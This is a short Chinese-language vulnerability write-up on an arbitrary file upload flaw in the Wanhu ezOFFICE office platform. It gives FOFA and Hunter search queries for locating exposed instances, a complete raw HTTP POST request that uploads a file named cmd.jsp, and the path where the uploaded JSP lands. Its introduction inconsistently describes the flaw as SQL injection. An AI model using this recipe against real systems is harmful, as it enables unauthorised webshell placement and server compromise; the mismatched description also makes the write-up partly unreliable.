万户协同办公平台fileUpload.controller任意文件上传漏洞
一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台fileUpload.controller任意文件上传漏洞,<font style="color:rgb(62, 62, 62);">攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。</font>
<font style="color:rgb(62, 62, 62);">二、影响版本</font>
- <font style="color:rgb(62, 62, 62);">万户ezoffice</font>
<font style="color:rgb(62, 62, 62);">三、资产测绘</font>
- <font style="color:rgb(62, 62, 62);">hunter</font>
<font style="color:rgb(62, 62, 62);">app.name="万户 Ezoffice OA"</font>
- <font style="color:rgb(62, 62, 62);">fofa </font>
<font style="color:rgb(62, 62, 62);">app="万户ezOFFICE协同管理平台"</font>
- <font style="color:rgb(62, 62, 62);">登录页面</font>
<font style="color:rgb(62, 62, 62);">四、漏洞复现</font>
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 232
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
111111
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--
http://xxxx/defaultroot/upload/html/2024092712083510631613209.jsp